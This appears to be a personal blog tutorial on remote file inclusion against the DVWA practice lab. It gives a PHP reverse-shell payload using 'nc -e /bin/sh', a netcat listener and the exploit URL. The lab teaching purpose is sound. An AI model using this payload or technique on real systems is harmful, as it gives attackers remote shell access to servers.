Ethical Hacking - Web Penetration Testing(6)

REMOTE FILE INCLUSION

  • Similar to local file inclusion.
  • But allows an attacker to read ANY file from ANY server.
  • Execute PHP files from other servers on the current server.
  • Store PHP files on other servers as .txt.

Pre-Condition:

Set allow_url_include to On status.

 

 Restart web service

 

 

Create a local php file on /var/www/html.

<?php
passthru("nc -e /bin/sh 10.0.0.13 8080");
?>

 

 

Execute the NC command to wait for connection.

nc -vv -l -p 8080

Visit the URL(http://10.0.0.24/dvwa/vulnerabilities/fi/?page=http://10.0.0.13/reverse.txt?) to execute the reverse connection commands.

 

 We connect to the target machine successfully.

 

posted @ 2020-02-07 22:08  晨风_Eric  阅读(136)  评论(0编辑  收藏  举报